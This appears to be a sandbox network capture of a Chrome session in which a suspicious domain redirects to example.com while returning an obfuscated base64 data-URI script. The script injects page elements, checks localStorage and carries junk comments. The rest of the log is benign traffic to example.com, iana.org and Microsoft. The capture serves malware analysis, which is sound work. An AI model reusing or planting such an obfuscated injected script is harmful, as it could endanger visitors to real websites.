                            Date: Thu, 10 Oct 2024 07:29:17 GMT
                            Server: Apache
                            X-Content-Type-Options: nosniff
                            Vary: Accept-Encoding
                            Last-Modified: Sun, 18 Jul 2021 22:53:48 GMT
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Cache-Control: public, max-age=3600
                            Expires: Thu, 10 Oct 2024 08:29:17 GMT
                            Content-Encoding: gzip
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Age: 2909
                            Content-Length: 2193
                            Keep-Alive: timeout=2, max=358
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 59 dd 6e db c8 15 be 8e 9f 62 96 5d 2c 6c c0 14 6d ef 5e 6c 62 49 80 eb 24 58 03 8d e1 cd 66 51 a0 37 c6 88 3c 92 26 26 39 cc cc 50 b2 b6 28 d0 d7 e8 eb f5 49 fa 9d 19 92 a2 7e 62 2b 0d d0 54 17 12 79 66 ce ff 99 f3 33 1a 7e 97 e9 d4 ad 2a 12 73 57 e4 e3 a3 61 fb 43 32 1b 1f bd 18 3a e5 72 1a ff b9 b6 aa 24 6b c5 9b c7 94 f2 9c ca 94 84 2c 33 f1 6b 2d 73 e5 56 e2 9d 2c e5 8c 0a 2a dd 30 09 18 47 c0 2d c8 49 91 ce a5 b1 e4 46 51 ed a6
                            Data Ascii: Ynb],lm^lbI$XfQ7<&&9P(I~b+Tyf3~*sWaC2:r$k,3k-sV,*0G-IFQ
                            Oct 10, 2024 10:17:47.991677046 CEST1236INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 07:29:17 GMT
                            Server: Apache
                            X-Content-Type-Options: nosniff
                            Vary: Accept-Encoding
                            Last-Modified: Sun, 18 Jul 2021 22:53:48 GMT
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Cache-Control: public, max-age=3600
                            Expires: Thu, 10 Oct 2024 08:29:17 GMT
                            Content-Encoding: gzip
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Age: 2909
                            Content-Length: 2193
                            Keep-Alive: timeout=2, max=358
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 59 dd 6e db c8 15 be 8e 9f 62 96 5d 2c 6c c0 14 6d ef 5e 6c 62 49 80 eb 24 58 03 8d e1 cd 66 51 a0 37 c6 88 3c 92 26 26 39 cc cc 50 b2 b6 28 d0 d7 e8 eb f5 49 fa 9d 19 92 a2 7e 62 2b 0d d0 54 17 12 79 66 ce ff 99 f3 33 1a 7e 97 e9 d4 ad 2a 12 73 57 e4 e3 a3 61 fb 43 32 1b 1f bd 18 3a e5 72 1a ff b9 b6 aa 24 6b c5 9b c7 94 f2 9c ca 94 84 2c 33 f1 6b 2d 73 e5 56 e2 9d 2c e5 8c 0a 2a dd 30 09 18 47 c0 2d c8 49 91 ce a5 b1 e4 46 51 ed a6
                            Data Ascii: Ynb],lm^lbI$XfQ7<&&9P(I~b+Tyf3~*sWaC2:r$k,3k-sV,*0G-IFQ


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.449737188.114.97.34431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:16:57 UTC672OUTGET /sYyRdjOU HTTP/1.1
                            Host: or4t.iednationusa.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-User: ?1
                            Sec-Fetch-Dest: document
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:16:57 UTC660INHTTP/1.1 302 Found
                            Date: Thu, 10 Oct 2024 08:16:57 GMT
                            Content-Type: text/html
                            Transfer-Encoding: chunked
                            Connection: close
                            Location: https://www.example.com
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DITEweDwWFxq0T7H%2FhGdbzlmQLAAe2IJv%2BVI3MNXWdtI0949%2FPCuR9n1UFC4v013NDp%2FenMCpGyOCOg2g9zq%2FSrp2KwA1mjHSS6vgsBV%2FL7cW%2FTAG5YaEh2rsb%2F2z2M9SDJjx%2FMHh1U%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Speculation-Rules: "/cdn-cgi/speculation"
                            Server: cloudflare
                            CF-RAY: 8d052bd5d90a0f99-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-10-10 08:16:57 UTC1369INData Raw: 31 30 38 32 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 79 67 70 65 32 6c 6d 4b 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 59 69 49 70 49 48 78 38 49 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 5a 79 49 70 4b 58 74 6b 62 32 4e 31 62 57 56 75 64 43 35 6f 5a 57 46 6b 4c 6d 46 77 63 47 56 75 5a 45 4e 6f 61 57 78 6b 4b 45 39 69 61 6d 56 6a 64 43 35 68 63 33 4e 70 5a 32 34 6f 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 33 4a 6c 59 58 52 6c 52 57 78 6c 62 57 56 75 64 43 67 69 5a 47 6c 32 49 69 6b 73 65 32 4e 73 59 58 4e 7a
                            Data Ascii: 1082<script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNz
                            2024-10-10 08:16:57 UTC1369INData Raw: 49 43 42 70 5a 69 68 73 62 32 4e 68 62 46 4e 30 62 33 4a 68 5a 32 55 75 5a 32 56 30 53 58 52 6c 62 53 67 6e 62 58 4e 6e 55 32 68 76 64 32 34 6e 4b 54 30 39 50 53 64 30 63 6e 56 6c 4a 79 6c 79 5a 58 52 31 63 6d 34 37 43 67 6b 67 49 43 41 67 4c 79 38 67 49 47 30 78 59 6b 74 52 62 55 59 4b 43 53 41 67 49 43 42 32 59 58 49 67 64 44 31 7a 5a 58 52 4a 62 6e 52 6c 63 6e 5a 68 62 43 68 6d 64 57 35 6a 64 47 6c 76 62 69 67 70 65 77 6f 4a 49 43 41 67 49 43 41 67 49 43 41 76 4c 79 41 67 4e 48 4a 76 5a 6b 46 77 55 67 6f 4a 49 43 41 67 49 43 41 67 49 43 42 32 59 58 49 67 5a 54 31 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 4a 6b 61 58 5a 62 63 6d 39 73 5a 54 30 6e 61 47 56 68 5a 47 6c 75 5a 79 64 64 57 32 52 68 64 47 45
                            Data Ascii: ICBpZihsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgnbXNnU2hvd24nKT09PSd0cnVlJylyZXR1cm47CgkgICAgLy8gIG0xYktRbUYKCSAgICB2YXIgdD1zZXRJbnRlcnZhbChmdW5jdGlvbigpewoJICAgICAgICAvLyAgNHJvZkFwUgoJICAgICAgICB2YXIgZT1kb2N1bWVudC5xdWVyeVNlbGVjdG9yKCJkaXZbcm9sZT0naGVhZGluZyddW2RhdGE
                            2024-10-10 08:16:57 UTC1369INData Raw: 48 4a 31 5a 53 63 70 4c 41 6f 4a 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 4c 79 38 67 49 44 56 69 53 31 42 4f 5a 55 45 4b 43 53 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 4e 73 5a 57 46 79 53 57 35 30 5a 58 4a 32 59 57 77 6f 64 43 6b 4b 43 53 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 38 76 49 43 42 4d 56 7a 49 78 55 7a 45 33 5a 77 6f 4a 49 43 41 67 49 43 41 67 49 43 42 39 43 67 6b 67 49 43 41 67 66 53 77 31 4d 44 41 70 43 67 6c 39 4b 54 73 4b 43 67 6c 6d 64 57 35 6a 64 47 6c 76 62 69 42 73 63 43 67 70 65 77 6f 4a 49 43 41 67 49 43 38 76 49 43 42 42 55 31 4d 77 54 6d 52 4f 65 41 6f 4a 49 43 41 67 49 48 5a 68 63 69 42 76 50 57 52 76 59 33 56 74 5a 57 35 30 4c 6e 46 31 5a 58 4a 35 55 32 56 73 5a 57 4e 30 62 33 49 6f 49 69 4e 70 4d 44 45 78
                            Data Ascii: HJ1ZScpLAoJICAgICAgICAgICAgLy8gIDViS1BOZUEKCSAgICAgICAgICAgIGNsZWFySW50ZXJ2YWwodCkKCSAgICAgICAgICAgIC8vICBMVzIxUzE3ZwoJICAgICAgICB9CgkgICAgfSw1MDApCgl9KTsKCglmdW5jdGlvbiBscCgpewoJICAgIC8vICBBU1MwTmROeAoJICAgIHZhciBvPWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIiNpMDEx
                            2024-10-10 08:16:57 UTC127INData Raw: 41 67 49 43 41 67 49 43 41 67 66 51 6f 4a 49 43 41 67 49 48 30 4b 43 53 41 67 49 43 42 7a 5a 58 52 55 61 57 31 6c 62 33 56 30 4b 47 78 77 4c 44 55 77 4d 43 6b 4b 43 53 41 67 49 43 41 76 4c 79 41 67 54 7a 4a 43 59 54 4e 58 65 6d 73 4b 43 58 30 4b 43 58 4e 6c 64 46 52 70 62 57 56 76 64 58 51 6f 62 48 41 73 4e 54 41 77 4b 54 73 4b 43 67 3d 3d 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a
                            Data Ascii: AgICAgICAgfQoJICAgIH0KCSAgICBzZXRUaW1lb3V0KGxwLDUwMCkKCSAgICAvLyAgTzJCYTNXemsKCX0KCXNldFRpbWVvdXQobHAsNTAwKTsKCg=="></script>
                            2024-10-10 08:16:57 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.44974093.184.215.144431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:16:58 UTC658OUTGET / HTTP/1.1
                            Host: www.example.com
                            Connection: keep-alive
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-User: ?1
                            Sec-Fetch-Dest: document
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:16:58 UTC361INHTTP/1.1 200 OK
                            Age: 566299
                            Cache-Control: max-age=604800
                            Content-Type: text/html; charset=UTF-8
                            Date: Thu, 10 Oct 2024 08:16:58 GMT
                            Etag: "3147526947+gzip+ident"
                            Expires: Thu, 17 Oct 2024 08:16:58 GMT
                            Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
                            Server: ECAcc (nyd/D188)
                            Vary: Accept-Encoding
                            X-Cache: HIT
                            Content-Length: 1256
                            Connection: close
                            2024-10-10 08:16:58 UTC1256INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74
                            Data Ascii: <!doctype html><html><head> <title>Example Domain</title> <meta charset="utf-8" /> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <style t


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.44974393.184.215.144431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:16:59 UTC586OUTGET /favicon.ico HTTP/1.1
                            Host: www.example.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://www.example.com/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:16:59 UTC341INHTTP/1.1 404 Not Found
                            Age: 568202
                            Cache-Control: max-age=604800
                            Content-Type: text/html; charset=UTF-8
                            Date: Thu, 10 Oct 2024 08:16:59 GMT
                            Expires: Thu, 17 Oct 2024 08:16:59 GMT
                            Last-Modified: Thu, 03 Oct 2024 18:26:58 GMT
                            Server: ECAcc (nyd/D157)
                            Vary: Accept-Encoding
                            X-Cache: 404-HIT
                            Content-Length: 1256
                            Connection: close
                            2024-10-10 08:16:59 UTC1256INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74
                            Data Ascii: <!doctype html><html><head> <title>Example Domain</title> <meta charset="utf-8" /> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <style t


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.44974423.60.203.209443
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:01 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            Accept-Encoding: identity
                            User-Agent: Microsoft BITS/7.8
                            Host: fs.microsoft.com
                            2024-10-10 08:17:01 UTC467INHTTP/1.1 200 OK
                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                            Content-Type: application/octet-stream
                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                            Server: ECAcc (lpl/EF67)
                            X-CID: 11
                            X-Ms-ApiVersion: Distribute 1.2
                            X-Ms-Region: prod-weu-z1
                            Cache-Control: public, max-age=203267
                            Date: Thu, 10 Oct 2024 08:17:01 GMT
                            Connection: close
                            X-CID: 2


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.44974523.60.203.209443
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:02 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            Accept-Encoding: identity
                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                            Range: bytes=0-2147483646
                            User-Agent: Microsoft BITS/7.8
                            Host: fs.microsoft.com
                            2024-10-10 08:17:02 UTC535INHTTP/1.1 200 OK
                            Content-Type: application/octet-stream
                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                            ApiVersion: Distribute 1.1
                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                            X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                            Cache-Control: public, max-age=203341
                            Date: Thu, 10 Oct 2024 08:17:02 GMT
                            Content-Length: 55
                            Connection: close
                            X-CID: 2
                            2024-10-10 08:17:02 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.449751192.0.46.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:09 UTC650OUTGET /domains/example HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-Dest: document
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:09 UTC1010INHTTP/1.1 301 Moved Permanently
                            Date: Thu, 10 Oct 2024 05:48:22 GMT
                            Server: Apache
                            Vary: Accept-Encoding
                            Location: http://www.iana.org/help/example-domains
                            Cache-Control: public, max-age=21603
                            Expires: Thu, 10 Oct 2024 07:48:22 GMT
                            Content-Length: 248
                            X-Frame-Options: SAMEORIGIN
                            Referrer-Policy: origin-when-cross-origin
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Age: 8927
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:09 UTC248INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 61 6e 61 2e 6f 72 67 2f 68 65 6c 70 2f 65 78 61 6d 70 6c 65 2d 64 6f 6d 61 69 6e 73 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.iana.org/help/example-domains">here</a>.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            6192.168.2.449756192.0.46.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:12 UTC516OUTGET /_css/2022/iana_website.css HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: text/css,*/*;q=0.1
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: style
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:12 UTC1073INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:12 GMT
                            Server: Apache
                            Vary: Accept-Encoding
                            Last-Modified: Wed, 14 Aug 2024 23:01:11 GMT
                            Content-Length: 42327
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Expires: Thu, 10 Oct 2024 08:46:01 GMT
                            X-Content-Type-Options: nosniff
                            Age: 70
                            Content-Type: text/css
                            Cache-Control: public, s-maxage=86402, max-age=604814
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Connection: close
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:12 UTC5781INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4e 6f 74 6f 22 3b 0a 20 20 73 72 63 3a 20 6c 6f 63 61 6c 28 22 4e 6f 74 6f 20 53 61 6e 73 22 29 2c 20 6c 6f 63 61 6c 28 22 4e 6f 74 6f 53 61 6e 73 22 29 2c 20 75 72 6c 28 22 2f 5f 69 6d 67 2f 32 30 32 32 2f 66 6f 6e 74 73 2f 4e 6f 74 6f 53 61 6e 73 2d 52 65 67 75 6c 61 72 2e 77 6f 66 66 22 29 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 7d 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4e 6f 74 6f 22 3b 0a 20 20 73 72 63 3a 20 6c 6f 63 61 6c 28 22 4e 6f 74 6f 20 53 61 6e 73 22 29 2c 20 6c 6f 63 61 6c 28 22 4e 6f 74 6f 53 61 6e 73 22 29 2c 20 75 72 6c 28
                            Data Ascii: @charset "UTF-8";@font-face { font-family: "Noto"; src: local("Noto Sans"), local("NotoSans"), url("/_img/2022/fonts/NotoSans-Regular.woff"); font-weight: 400;}@font-face { font-family: "Noto"; src: local("Noto Sans"), local("NotoSans"), url(
                            2024-10-10 08:17:12 UTC2411INData Raw: 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 63 63 65 65 66 66 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 65 6d 3b 0a 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 62 34 63 38 64 64 3b 0a 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 62 34 63 38 64 64 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 7d 0a 2e 70 61 6e 65 6c 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 69 63 6f 6e 20 7b 0a 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 31 30 70 78 20 31 30 70 78 20 36 30 70 78 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 2f 5f 69 6d 67 2f 32 30 31 31 2e 31 2f 69 63 6f 6e 73 2f 69 63 6f 6e 5f 61 6c 65 72 74 2e 70 6e 67 29 3b 0a 20 20 62 61
                            Data Ascii: ackground-color: #cceeff; margin-top: 1em; border-top: 1px solid #b4c8dd; border-bottom: 1px solid #b4c8dd; padding: 10px;}.panel_information.icon { padding: 10px 10px 10px 60px; background-image: url(/_img/2011.1/icons/icon_alert.png); ba
